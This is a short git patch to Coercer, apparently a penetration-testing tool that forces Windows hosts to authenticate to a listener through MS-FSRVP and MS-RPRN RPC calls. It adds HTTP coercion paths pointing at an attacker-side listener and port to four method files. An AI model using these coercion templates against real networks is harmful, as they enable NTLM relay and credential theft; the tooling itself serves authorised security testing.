From a42040b19e9babcf8d6e16516c22c79c3d2cb45f Mon Sep 17 00:00:00 2001
From: "Remi GASCOU (Podalirius)"
 <79218792+p0dalirius@users.noreply.github.com>
Date: Mon, 14 Oct 2024 18:17:06 +0200
Subject: [PATCH] Fixed #83

---
 coercer/methods/MS_FSRVP/IsPathShadowCopied.py                 | 3 ++-
 coercer/methods/MS_FSRVP/IsPathSupported.py                    | 3 ++-
 .../MS_RPRN/RpcRemoteFindFirstPrinterChangeNotification.py     | 3 ++-
 .../MS_RPRN/RpcRemoteFindFirstPrinterChangeNotificationEx.py   | 2 +-
 4 files changed, 7 insertions(+), 4 deletions(-)

diff --git a/coercer/methods/MS_FSRVP/IsPathShadowCopied.py b/coercer/methods/MS_FSRVP/IsPathShadowCopied.py
index 0687d97..571bdab 100644
--- a/coercer/methods/MS_FSRVP/IsPathShadowCopied.py
+++ b/coercer/methods/MS_FSRVP/IsPathShadowCopied.py
@@ -36,7 +36,8 @@ class IsPathShadowCopied(MSPROTOCOLRPCCALL):
     """
 
     exploit_paths = [
-        ("smb", '\\\\{{listener}}\x00')
+        ("smb", '\\\\{{listener}}\x00'),
+        ("http", '\\\\{{listener}}@{{http_listen_port}}/{{rnd(3)}}\x00')
     ]
     
     access = {
diff --git a/coercer/methods/MS_FSRVP/IsPathSupported.py b/coercer/methods/MS_FSRVP/IsPathSupported.py
index a62c8b4..bd9ff62 100644
--- a/coercer/methods/MS_FSRVP/IsPathSupported.py
+++ b/coercer/methods/MS_FSRVP/IsPathSupported.py
@@ -36,7 +36,8 @@ class IsPathSupported(MSPROTOCOLRPCCALL):
     """
 
     exploit_paths = [
-        ("smb", '\\\\{{listener}}\x00')
+        ("smb", '\\\\{{listener}}\x00'),
+        ("http", '\\\\{{listener}}@{{http_listen_port}}/{{rnd(3)}}\x00')
     ]
     
     access = {
diff --git a/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotification.py b/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotification.py
index b4ab89c..848a674 100644
--- a/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotification.py
+++ b/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotification.py
@@ -19,7 +19,8 @@ class RpcRemoteFindFirstPrinterChangeNotification(MSPROTOCOLRPCCALL):
     """
 
     exploit_paths = [
-        ("smb", '\\\\{{listener}}\x00')
+        ("smb", '\\\\{{listener}}\x00'),
+        ("http", '\\\\{{listener}}@{{http_listen_port}}/{{rnd(3)}}\x00')
     ]
     
     access = {
diff --git a/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotificationEx.py b/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotificationEx.py
index 5def06d..f315546 100644
--- a/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotificationEx.py
+++ b/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotificationEx.py
@@ -20,7 +20,7 @@ class RpcRemoteFindFirstPrinterChangeNotificationEx(MSPROTOCOLRPCCALL):
 
     exploit_paths = [
         ("smb", '\\\\{{listener}}\x00'),
-        ("http", '\\\\{{listener}}@80/print\x00')
+        ("http", '\\\\{{listener}}@{{http_listen_port}}/{{rnd(3)}}\x00')
     ]
 
     access = {